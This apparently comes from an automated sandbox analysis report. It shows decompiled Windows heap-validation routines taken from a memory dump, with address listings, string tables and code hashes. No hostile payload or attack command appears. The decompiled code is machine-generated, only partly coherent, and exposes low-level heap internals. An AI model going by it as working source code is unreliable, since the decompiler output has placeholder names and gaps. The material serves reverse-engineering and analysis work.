                      									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                      										__eflags =  *(_t414 + 0x4c);
                      										if( *(_t414 + 0x4c) != 0) {
                      											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                      											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                      											__eflags =  *_t415;
                      										}
                      										goto L107;
                      									}
                      									_t249 =  *[fs:0x30];
                      									__eflags =  *(_t249 + 0xc);
                      									if( *(_t249 + 0xc) == 0) {
                      										_push("HEAP: ");
                      										E0162B150();
                      									} else {
                      										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      									}
                      									_push( *((intOrPtr*)(_t332 + 0x28)));
                      									_push(_t415);
                      									_push("Heap block at %p is not last block in segment (%p)\n");
                      									L95:
                      									E0162B150();
                      									goto L117;
                      								}
                      								_v12 = _v12 + 1;
                      								_v16 = _v16 + (_t245 >> 0xc);
                      								if( *(_t414 + 0x4c) != 0) {
                      									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                      									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                      								}
                      								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                      								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                      									L82:
                      									_v8 = _v8 & 0x00000000;
                      									goto L86;
                      								} else {
                      									if( *(_t414 + 0x4c) != 0) {
                      										_t397 =  *(_t414 + 0x50) ^  *_t415;
                      										 *_t415 = _t397;
                      										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                      										_t442 = _t397 >> 0x18 - _t367;
                      										if(_t397 >> 0x18 != _t367) {
                      											_push(_t367);
                      											E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                      										}
                      									}
                      									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                      										_t259 =  *[fs:0x30];
                      										__eflags =  *(_t259 + 0xc);
                      										if( *(_t259 + 0xc) == 0) {
                      											_push("HEAP: ");
                      											E0162B150();
                      										} else {
                      											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      										}
                      										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                      										_push(_t415);
                      										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                      										goto L95;
                      									} else {
                      										if( *(_t414 + 0x4c) != 0) {
                      											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                      											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                      										}
                      										goto L82;
                      									}
                      								}
                      							}
                      						}
                      						_t281 = _v28 + 0xfffffff0;
                      						_v24 = _t281;
                      						__eflags = _t390 & 0x00000002;
                      						if((_t390 & 0x00000002) != 0) {
                      							__eflags = _t281 - 4;
                      							if(_t281 > 4) {
                      								_t281 = _t281 - 4;
                      								__eflags = _t281;
                      								_v24 = _t281;
                      							}
                      						}
                      						__eflags = _t390 & 0x00000008;
                      						if((_t390 & 0x00000008) == 0) {
                      							_t102 = _t415 + 0x10; // -8
                      							_t283 = E0167D540(_t102, _t281, 0xfeeefeee);
                      							_v20 = _t283;
                      							__eflags = _t283 - _v24;
                      							if(_t283 != _v24) {
                      								_t284 =  *[fs:0x30];
                      								__eflags =  *(_t284 + 0xc);
                      								if( *(_t284 + 0xc) == 0) {
                      									_push("HEAP: ");
                      									E0162B150();
                      								} else {
                      									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      								}
                      								_t288 = _v20 + 8 + _t415;
                      								__eflags = _t288;
                      								_push(_t288);
                      								_push(_t415);
                      								_push("Free Heap block %p modified at %p after it was freed\n");
                      								goto L95;
                      							}
                      							goto L66;
                      						} else {
                      							_t374 =  *(_t415 + 8);
                      							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                      							_v24 = _t374;
                      							_v28 = _t400;
                      							_t294 =  *(_t374 + 4);
                      							__eflags =  *_t400 - _t294;
                      							if( *_t400 != _t294) {
                      								L64:
                      								_push(_t374);
                      								_push( *_t400);
                      								_t101 = _t415 + 8; // -16
                      								E016EA80D(_t414, 0xd, _t101, _t294);
                      								goto L86;
                      							}
                      							_t56 = _t415 + 8; // -16
                      							__eflags =  *_t400 - _t56;
                      							_t374 = _v24;
                      							if( *_t400 != _t56) {
                      								goto L64;
                      							}
                      							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                      							_t402 =  *(_t414 + 0xb4);
                      							__eflags = _t402;
                      							if(_t402 == 0) {
                      								L35:
                      								_t298 = _v28;
                      								 *_t298 = _t374;
                      								 *(_t374 + 4) = _t298;
                      								__eflags =  *(_t415 + 2) & 0x00000008;
                      								if(( *(_t415 + 2) & 0x00000008) == 0) {
                      									L39:
                      									_t377 =  *_t415 & 0x0000ffff;
                      									_t299 = _t414 + 0xc0;
                      									_v28 =  *_t415 & 0x0000ffff;
                      									 *(_t415 + 2) = 0;
                      									 *((char*)(_t415 + 7)) = 0;
                      									__eflags =  *(_t414 + 0xb4);
                      									if( *(_t414 + 0xb4) == 0) {
                      										_t378 =  *_t299;
                      									} else {
                      										_t378 = E0164E12C(_t414, _t377);
                      										_t299 = _t414 + 0xc0;
                      									}
                      									__eflags = _t299 - _t378;
                      									if(_t299 == _t378) {
                      										L51:
                      										_t300 =  *((intOrPtr*)(_t378 + 4));
                      										__eflags =  *_t300 - _t378;
                      										if( *_t300 != _t378) {
                      											_push(_t378);
                      											_push( *_t300);
                      											__eflags = 0;
                      											E016EA80D(0, 0xd, _t378, 0);
                      										} else {
                      											_t87 = _t415 + 8; // -16
                      											_t406 = _t87;
                      											 *_t406 = _t378;
                      											 *((intOrPtr*)(_t406 + 4)) = _t300;
                      											 *_t300 = _t406;
                      											 *((intOrPtr*)(_t378 + 4)) = _t406;
                      										}
                      										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                      										_t405 =  *(_t414 + 0xb4);
                      										__eflags = _t405;
                      										if(_t405 == 0) {
                      											L61:
                      											__eflags =  *(_t414 + 0x4c);
                      											if(__eflags != 0) {
                      												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                      												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                      											}
                      											goto L86;
                      										} else {
                      											_t380 =  *_t415 & 0x0000ffff;
                      											while(1) {
                      												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                      												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                      													break;
                      												}
                      												_t307 =  *_t405;
                      												__eflags = _t307;
                      												if(_t307 == 0) {
                      													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                      													L60:
                      													_t94 = _t415 + 8; // -16
                      													E0164E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                      													goto L61;
                      												}
                      												_t405 = _t307;
                      											}
                      											_t309 = _t380;
                      											goto L60;
                      										}
                      									} else {
                      										_t407 =  *(_t414 + 0x4c);
                      										while(1) {
                      											__eflags = _t407;
                      											if(_t407 == 0) {
                      												_t312 =  *(_t378 - 8) & 0x0000ffff;
                      											} else {
                      												_t315 =  *(_t378 - 8);
                      												_t407 =  *(_t414 + 0x4c);
                      												__eflags = _t315 & _t407;
                      												if((_t315 & _t407) != 0) {
                      													_t315 = _t315 ^  *(_t414 + 0x50);
                      													__eflags = _t315;
                      												}
                      												_t312 = _t315 & 0x0000ffff;
                      											}
                      											__eflags = _v28 - (_t312 & 0x0000ffff);
                      											if(_v28 <= (_t312 & 0x0000ffff)) {
                      												goto L51;
                      											}
                      											_t378 =  *_t378;
                      											__eflags = _t414 + 0xc0 - _t378;
                      											if(_t414 + 0xc0 != _t378) {
                      												continue;
                      											}
                      											goto L51;
                      										}
                      										goto L51;
                      									}
                      								}
                      								_t317 = E0164A229(_t414, _t415);
                      								__eflags = _t317;
                      								if(_t317 != 0) {
                      									goto L39;
                      								}
                      								E0164A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                      								goto L86;
                      							}
                      							_t385 =  *_t415 & 0x0000ffff;
                      							while(1) {
                      								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                      								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                      									break;
                      								}
                      								_t320 =  *_t402;
                      								__eflags = _t320;
                      								if(_t320 == 0) {
                      									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                      									L34:
                      									_t63 = _t415 + 8; // -16
                      									E0164BC04(_t414, _t402, 1, _t63, _t322, _t385);
                      									_t374 = _v24;
                      									goto L35;
                      								}
                      								_t402 = _t320;
                      							}
                      							_t322 = _t385;
                      							goto L34;
                      						}
                      					}
                      					if(_a20 == 0) {
                      						L18:
                      						if(( *(_t415 + 2) & 0x00000004) == 0) {
                      							goto L67;
                      						}
                      						if(E016D23E3(_t414, _t415) == 0) {
                      							goto L117;
                      						}
                      						goto L67;
                      					} else {
                      						if((_t390 & 0x00000002) == 0) {
                      							_t326 =  *(_t415 + 3) & 0x000000ff;
                      						} else {
                      							_t328 = E01621F5B(_t415);
                      							_t342 = _v20;
                      							_t326 =  *(_t328 + 2) & 0x0000ffff;
                      						}
                      						_t429 = _t326;
                      						if(_t429 == 0) {
                      							goto L18;
                      						}
                      						if(_t429 >= 0) {
                      							__eflags = _t326 & 0x00000800;
                      							if(__eflags != 0) {
                      								goto L18;
                      							}
                      							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                      							if(__eflags >= 0) {
                      								goto L18;
                      							}
                      							_t412 = _a20;
                      							_t327 = _t326 & 0x0000ffff;
                      							L17:
                      							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                      							goto L18;
                      						}
                      						_t327 = _t326 & 0x00007fff;
                      						if(_t327 >= 0x81) {
                      							goto L18;
                      						}
                      						_t412 = _a24;
                      						goto L17;
                      					}
                      					L86:
                      				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                      				_t189 = _v12;
                      				goto L88;
                      				}
                      0x00000000
                      0x016e4d11
                      0x00000000
                      0x016e4ce5
                      0x016e4ce0
                      0x016e4c8a
                      0x016e4c8f
                      0x016e4c91
                      0x00000000
                      0x00000000
                      0x016e4c9d
                      0x00000000
                      0x016e4c9d
                      0x016e4c52
                      0x016e4c5f
                      0x016e4c5f
                      0x016e4c62
                      0x00000000
                      0x00000000
                      0x016e4c57
                      0x016e4c59
                      0x016e4c5b
                      0x016e4caa
                      0x016e4c66
                      0x016e4c68
                      0x016e4c70
                      0x016e4c75
                      0x00000000
                      0x016e4c75
                      0x016e4c5d
                      0x016e4c5d
                      0x016e4c64
                      0x00000000
                      0x016e4c64
                      0x016e4c17
                      0x016e4b75
                      0x016e4bc4
                      0x016e4bc8
                      0x00000000
                      0x00000000
                      0x016e4bd9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e4b77
                      0x016e4b7a
                      0x016e4b8c
                      0x016e4b7c
                      0x016e4b7e
                      0x016e4b83
                      0x016e4b86
                      0x016e4b86
                      0x016e4b90
                      0x016e4b93
                      0x00000000
                      0x00000000
                      0x016e4b95
                      0x016e4bab
                      0x016e4bb0
                      0x00000000
                      0x00000000
                      0x016e4bb2
                      0x016e4bb9
                      0x00000000
                      0x00000000
                      0x016e4bbb
                      0x016e4bbe
                      0x016e4bc1
                      0x016e4bc1
                      0x00000000
                      0x016e4bc1
                      0x016e4b97
                      0x016e4ba4
                      0x00000000
                      0x00000000
                      0x016e4ba6
                      0x00000000
                      0x016e4ba6
                      0x016e4ea9
                      0x016e4ea9
                      0x016e4eb2
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                      • API String ID: 0-3591852110
                      • Opcode ID: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                      • Instruction ID: 537974da34dc4c17f618d91f6ff19ceef10c7751849d4fe722114eb113b74efe
                      • Opcode Fuzzy Hash: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                      • Instruction Fuzzy Hash: E012BE306026429FDB25DF69C898BB6BBE2EF48614F14865DE486CB741DB35E881CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 56%
                      			E016E4496(signed int* __ecx, void* __edx) {
                      				signed int _v5;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed char _v24;
                      				signed int* _v28;
                      				char _v32;
                      				signed int* _v36;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t150;
                      				intOrPtr _t151;
                      				signed char _t156;
                      				intOrPtr _t157;
                      				unsigned int _t169;
                      				intOrPtr _t170;
                      				signed int* _t183;
                      				signed char _t184;
                      				intOrPtr _t191;
                      				signed int _t201;
                      				intOrPtr _t203;
                      				intOrPtr _t212;
                      				intOrPtr _t220;
                      				signed int _t230;
                      				signed int _t241;
                      				signed int _t244;
                      				void* _t259;
                      				signed int _t260;
                      				signed int* _t261;
                      				intOrPtr* _t262;
                      				signed int _t263;
                      				signed int* _t264;
                      				signed int _t267;
                      				signed int* _t268;
                      				void* _t270;
                      				void* _t281;
                      				signed short _t285;
                      				signed short _t289;
                      				signed int _t291;
                      				signed int _t298;
                      				signed char _t303;
                      				signed char _t308;
                      				signed int _t314;
                      				intOrPtr _t317;
                      				unsigned int _t319;
                      				signed int* _t325;
                      				signed int _t326;
                      				signed int _t327;
                      				intOrPtr _t328;
                      				signed int _t329;
                      				signed int _t330;
                      				signed int* _t331;
                      				signed int _t332;
                      				signed int _t350;
                      
                      				_t259 = __edx;
                      				_t331 = __ecx;
                      				_v28 = __ecx;
                      				_v20 = 0;
                      				_v12 = 0;
                      				_t150 = E016E49A4(__ecx);
                      				_t267 = 1;
                      				if(_t150 == 0) {
                      					L61:
                      					_t151 =  *[fs:0x30];
                      					__eflags =  *((char*)(_t151 + 2));
                      					if( *((char*)(_t151 + 2)) != 0) {
                      						 *0x1716378 = _t267;
                      						asm("int3");
                      						 *0x1716378 = 0;
                      					}
                      					__eflags = _v12;
                      					if(_v12 != 0) {
                      						_t105 =  &_v16;
                      						 *_t105 = _v16 & 0x00000000;
                      						__eflags =  *_t105;
                      						E0165174B( &_v12,  &_v16, 0x8000);
                      					}
                      					L65:
                      					__eflags = 0;
                      					return 0;
                      				}
                      				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                      					_t268 =  &(_t331[0x30]);
                      					_v32 = 0;
                      					_t260 =  *_t268;
                      					_t308 = 0;
                      					_v24 = 0;
                      					while(_t268 != _t260) {
                      						_t260 =  *_t260;
                      						_v16 =  *_t325 & 0x0000ffff;
                      						_t156 = _t325[0];
                      						_v28 = _t325;
                      						_v5 = _t156;
                      						__eflags = _t156 & 0x00000001;
                      						if((_t156 & 0x00000001) != 0) {
                      							_t157 =  *[fs:0x30];
                      							__eflags =  *(_t157 + 0xc);
                      							if( *(_t157 + 0xc) == 0) {
                      								_push("HEAP: ");
                      								E0162B150();
                      							} else {
                      								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      							}
                      							_push(_t325);
                      							E0162B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                      							L32:
                      							_t270 = 0;
                      							__eflags = _t331[0x13];
                      							if(_t331[0x13] != 0) {
                      								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                      								 *_t325 =  *_t325 ^ _t331[0x14];
                      							}
                      							L60:
                      							_t267 = _t270 + 1;
                      							__eflags = _t267;
                      							goto L61;
                      						}
                      						_t169 =  *_t325 & 0x0000ffff;
                      						__eflags = _t169 - _t308;
                      						if(_t169 < _t308) {
                      							_t170 =  *[fs:0x30];
                      							__eflags =  *(_t170 + 0xc);
                      							if( *(_t170 + 0xc) == 0) {
                      								_push("HEAP: ");
                      								E0162B150();
                      							} else {
                      								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      							}
                      							E0162B150("Non-Dedicated free list element %p is out of order\n", _t325);
                      							goto L32;
                      						} else {
                      							__eflags = _t331[0x13];
                      							_t308 = _t169;
                      							_v24 = _t308;
                      							if(_t331[0x13] != 0) {
                      								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                      								 *_t325 =  *_t325 ^ _t331[0x14];
                      								__eflags =  *_t325;
                      							}
                      							_t26 =  &_v32;
                      							 *_t26 = _v32 + 1;
                      							__eflags =  *_t26;
                      							continue;
                      						}
                      					}
                      					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                      					if( *0x1716350 != 0 && _t331[0x2f] != 0) {
                      						_push(4);
                      						_push(0x1000);
                      						_push( &_v16);
                      						_push(0);
                      						_push( &_v12);
                      						_push(0xffffffff);
                      						if(E01669660() >= 0) {
                      							_v20 = _v12 + 0x204;
                      						}
                      					}
                      					_t183 =  &(_t331[0x27]);
                      					_t281 = 0x81;
                      					_t326 =  *_t183;
                      					if(_t183 == _t326) {
                      						L49:
                      						_t261 =  &(_t331[0x29]);
                      						_t184 = 0;
                      						_t327 =  *_t261;
                      						_t282 = 0;
                      						_v24 = 0;
                      						_v36 = 0;
                      						__eflags = _t327 - _t261;
                      						if(_t327 == _t261) {
                      							L53:
                      							_t328 = _v32;
                      							_v28 = _t331;
                      							__eflags = _t328 - _t184;
                      							if(_t328 == _t184) {
                      								__eflags = _t331[0x1d] - _t282;
                      								if(_t331[0x1d] == _t282) {
                      									__eflags = _v12;
                      									if(_v12 == 0) {
                      										L82:
                      										_t267 = 1;
                      										__eflags = 1;
                      										goto L83;
                      									}
                      									_t329 = _t331[0x2f];
                      									__eflags = _t329;
                      									if(_t329 == 0) {
                      										L77:
                      										_t330 = _t331[0x22];
                      										__eflags = _t330;
                      										if(_t330 == 0) {
                      											L81:
                      											_t129 =  &_v16;
                      											 *_t129 = _v16 & 0x00000000;
                      											__eflags =  *_t129;
                      											E0165174B( &_v12,  &_v16, 0x8000);
                      											goto L82;
                      										}
                      										_t314 = _t331[0x21] & 0x0000ffff;
                      										_t285 = 1;
                      										__eflags = 1 - _t314;
                      										if(1 >= _t314) {
                      											goto L81;
                      										} else {
                      											goto L79;
                      										}
                      										while(1) {
                      											L79:
                      											_t330 = _t330 + 0x40;
                      											_t332 = _t285 & 0x0000ffff;
                      											_t262 = _v20 + _t332 * 4;
                      											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                      											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                      												break;
                      											}
                      											_t285 = _t285 + 1;
                      											__eflags = _t285 - _t314;
                      											if(_t285 < _t314) {
                      												continue;
                      											}
                      											goto L81;
                      										}
                      										_t191 =  *[fs:0x30];
                      										__eflags =  *(_t191 + 0xc);
                      										if( *(_t191 + 0xc) == 0) {
                      											_push("HEAP: ");
                      											E0162B150();
                      										} else {
                      											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      										}
                      										_push(_t262);
                      										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                      										_t148 = _t330 + 0x10; // 0x10
                      										_push( *((intOrPtr*)(_t330 + 8)));
                      										E0162B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                      										L59:
                      										_t270 = 0;
                      										__eflags = 0;
                      										goto L60;
                      									}
                      									_t289 = 1;
                      									__eflags = 1;
                      									while(1) {
                      										_t201 = _v12;
                      										_t329 = _t329 + 0xc;
                      										_t263 = _t289 & 0x0000ffff;
                      										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                      										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                      											break;
                      										}
                      										_t289 = _t289 + 1;
                      										__eflags = _t289 - 0x81;
                      										if(_t289 < 0x81) {
                      											continue;
                      										}
                      										goto L77;
                      									}
                      									_t203 =  *[fs:0x30];
                      									__eflags =  *(_t203 + 0xc);
                      									if( *(_t203 + 0xc) == 0) {
                      										_push("HEAP: ");
                      										E0162B150();
                      									} else {
                      										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      									}
                      									_t291 = _v12;
                      									_push(_t291 + _t263 * 4);
                      									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                      									_push( *((intOrPtr*)(_t329 + 8)));
                      									E0162B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                      									goto L59;
                      								}
                      								_t212 =  *[fs:0x30];
                      								__eflags =  *(_t212 + 0xc);
                      								if( *(_t212 + 0xc) == 0) {
                      									_push("HEAP: ");
                      									E0162B150();
                      								} else {
                      									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      								}
                      								_push(_t331[0x1d]);
                      								_push(_v36);
                      								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                      								L58:
                      								E0162B150();
                      								goto L59;
                      							}
                      							_t220 =  *[fs:0x30];
                      							__eflags =  *(_t220 + 0xc);
                      							if( *(_t220 + 0xc) == 0) {
                      								_push("HEAP: ");
                      								E0162B150();
                      							} else {
                      								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      							}
                      							_push(_t328);
                      							_push(_v24);
                      							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                      							goto L58;
                      						} else {
                      							goto L50;
                      						}
                      						while(1) {
                      							L50:
                      							_t92 = _t327 - 0x10; // -24
                      							_t282 = _t331;
                      							_t230 = E016E4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                      							__eflags = _t230;
                      							if(_t230 == 0) {
                      								goto L59;
                      							}
                      							_t327 =  *_t327;
                      							__eflags = _t327 - _t261;
                      							if(_t327 != _t261) {
                      								continue;
                      							}
                      							_t184 = _v24;
                      							_t282 = _v36;
                      							goto L53;
                      						}
                      						goto L59;
                      					} else {
                      						while(1) {
                      							_t39 = _t326 + 0x18; // 0x10
                      							_t264 = _t39;
                      							if(_t331[0x13] != 0) {
                      								_t319 = _t331[0x14] ^  *_t264;
                      								 *_t264 = _t319;
                      								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                      								_t348 = _t319 >> 0x18 - _t303;
                      								if(_t319 >> 0x18 != _t303) {
                      									_push(_t303);
                      									E016DFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                      								}
                      								_t281 = 0x81;
                      							}
                      							_t317 = _v20;
                      							if(_t317 != 0) {
                      								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                      								_t350 = _t241;
                      								if(_t350 != 0) {
                      									if(_t350 >= 0) {
                      										__eflags = _t241 & 0x00000800;
                      										if(__eflags == 0) {
                      											__eflags = _t241 - _t331[0x21];
                      											if(__eflags < 0) {
                      												_t298 = _t241;
                      												_t65 = _t317 + _t298 * 4;
                      												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                      												__eflags =  *_t65;
                      											}
                      										}
                      									} else {
                      										_t244 = _t241 & 0x00007fff;
                      										if(_t244 < _t281) {
                      											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                      										}
                      									}
                      								}
                      							}
                      							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E016D23E3(_t331, _t264) == 0) {
                      								break;
                      							}
                      							if(_t331[0x13] != 0) {
                      								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                      								 *_t264 =  *_t264 ^ _t331[0x14];
                      							}
                      							_t326 =  *_t326;
                      							if( &(_t331[0x27]) == _t326) {
                      								goto L49;
                      							} else {
                      								_t281 = 0x81;
                      								continue;
                      							}
                      						}
                      						__eflags = _t331[0x13];
                      						if(_t331[0x13] != 0) {
                      							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                      							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                      						}
                      						goto L65;
                      					}
                      				} else {
                      					L83:
                      					return _t267;
                      				}
                      			}

                      0x00000000
                      0x016e45c3
                      0x016e45c3
                      0x016e45c7
                      0x016e45c7
                      0x016e45ca
                      0x016e45cf
                      0x016e45d3
                      0x016e45df
                      0x016e45e4
                      0x016e45e6
                      0x016e45e8
                      0x016e45ed
                      0x016e45ed
                      0x016e45f2
                      0x016e45f2
                      0x016e45f7
                      0x016e45fc
                      0x016e4602
                      0x016e4606
                      0x016e4609
                      0x016e460f
                      0x016e46de
                      0x016e46e3
                      0x016e46e5
                      0x016e46ec
                      0x016e46ee
                      0x016e46f6
                      0x016e46f6
                      0x016e46f6
                      0x016e46f6
                      0x016e46ec
                      0x016e4615
                      0x016e4615
                      0x016e461d
                      0x016e462e
                      0x016e462e
                      0x016e461d
                      0x016e460f
                      0x016e4609
                      0x016e46fd
                      0x00000000
                      0x00000000
                      0x016e4710
                      0x016e471a
                      0x016e4720
                      0x016e4720
                      0x016e4722
                      0x016e472c
                      0x00000000
                      0x016e472e
                      0x016e472e
                      0x00000000
                      0x016e472e
                      0x016e472c
                      0x016e4738
                      0x016e473c
                      0x016e474b
                      0x016e4751
                      0x016e4751
                      0x00000000
                      0x016e473c
                      0x016e48f4
                      0x016e48f4
                      0x00000000
                      0x016e48f4

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                      • API String ID: 0-1357697941
                      • Opcode ID: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                      • Instruction ID: c354e8cf366179c4ed64f68c740f97c33cbeb53464c89a0f30de9b13ac8f0e82
                      • Opcode Fuzzy Hash: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                      • Instruction Fuzzy Hash: 40F10E31602656DFDB25CFA9C888BAABBF2FF05300F198259E546D7641CB30A985CB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-523794902
                      • Opcode ID: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                      • Instruction ID: a58218d68883bb604f2bbf9ab8a1bdff1839293b13ab0011d1eb6539b736bb00
                      • Opcode Fuzzy Hash: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                      • Instruction Fuzzy Hash: 74421031244742AFDB15CF68CC94B2ABBEAFF84214F14896DE586CB352D734D981CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                      • API String ID: 0-1745908468
                      • Opcode ID: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                      • Instruction ID: 5e4a8988300ccab08feed0086c2caef76e05b8b24dd72e6c60a84f629369f680
                      • Opcode Fuzzy Hash: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                      • Instruction Fuzzy Hash: 5E911F31602641DFDB26DFA8CC58AADBFF2FF49610F18815CE5465B391C7329882CB08
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • Kernel-MUI-Language-SKU, xrefs: 01633F70
                      • WindowsExcludedProcs, xrefs: 01633D6F
